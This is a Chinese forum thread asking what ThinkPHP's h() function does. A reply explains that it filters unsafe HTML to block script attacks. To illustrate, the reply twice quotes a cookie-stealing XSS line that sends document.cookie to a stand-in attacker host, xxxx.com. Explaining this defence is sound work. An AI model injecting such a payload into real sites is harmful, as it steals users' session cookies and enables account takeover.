tp扩展函数库的h函数到底什么意思啊?
时间:2011-07-05
来源:互联网
如题,
输出安全的Html代码,不懂怎么个意思
输出安全的Html代码,不懂怎么个意思
作者: zhangchongdytm 发布时间: 2011-07-05
防止js等脚本攻击的。过滤到不安全的代码。
如果你的编辑器 用户能写 js 代码, 而你网站是使用cookie的, 那么别人 很容易用js盗取用户cookie的。你如果把用户的重要信息(如密码等) 写在了cookie中, 太不安全了。。
比如, 别人写这样一段js代码:
document.write("〈 img src='http://xxxx.com/xxx.php"+
"?c="+document.cookie+"'〉");
这里 xxxx.com 是他自己的网站, 他只需要 在xxx.php 文件中 写好处理c参数的代码, 就能轻松盗取你网站的cookie。
h函数 就是过滤这些不安全的代码的。
如果你的编辑器 用户能写 js 代码, 而你网站是使用cookie的, 那么别人 很容易用js盗取用户cookie的。你如果把用户的重要信息(如密码等) 写在了cookie中, 太不安全了。。
比如, 别人写这样一段js代码:
document.write("〈 img src='http://xxxx.com/xxx.php"+
"?c="+document.cookie+"'〉");
这里 xxxx.com 是他自己的网站, 他只需要 在xxx.php 文件中 写好处理c参数的代码, 就能轻松盗取你网站的cookie。
h函数 就是过滤这些不安全的代码的。
作者: luofei614 发布时间: 2011-07-06
相关阅读 更多
热门阅读
-
office 2019专业增强版最新2021版激活秘钥/序列号/激活码推荐 附激活工具
阅读:74
-
如何安装mysql8.0
阅读:31
-
Word快速设置标题样式步骤详解
阅读:28
-
20+道必知必会的Vue面试题(附答案解析)
阅读:37
-
HTML如何制作表单
阅读:22
-
百词斩可以改天数吗?当然可以,4个步骤轻松修改天数!
阅读:31
-
ET文件格式和XLS格式文件之间如何转化?
阅读:24
-
react和vue的区别及优缺点是什么
阅读:121
-
支付宝人脸识别如何关闭?
阅读:21
-
腾讯微云怎么修改照片或视频备份路径?
阅读:28
